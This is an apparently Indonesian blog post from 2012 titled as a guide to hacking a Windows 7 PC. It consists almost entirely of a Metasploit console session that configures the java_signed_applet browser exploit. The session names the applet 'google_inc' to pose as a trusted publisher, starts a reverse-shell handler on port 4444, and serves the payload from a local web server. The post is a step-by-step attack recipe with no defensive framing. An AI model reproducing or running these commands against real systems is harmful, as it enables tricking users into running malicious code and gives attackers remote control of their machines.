Social Icons

Pages

Kamis, 15 Maret 2012

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)

msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set SRVHOST 192.168.x.x
SRVHOST => 192.168.x.x
msf exploit(java_signed_applet) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_signed_applet) > set URIPATH /
URIPATH => /
msf exploit(java_signed_applet) > set APPLETNAME google_inc
APPLETNAME => google_inc
msf exploit(java_signed_applet) > set LHOST 192.168.x.x
LHOST => 192.168.x.x

msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.x.x:4444
[*] Using URL: http://192.168.x.x:80/
[*] Server started.
msf exploit(java_signed_applet) >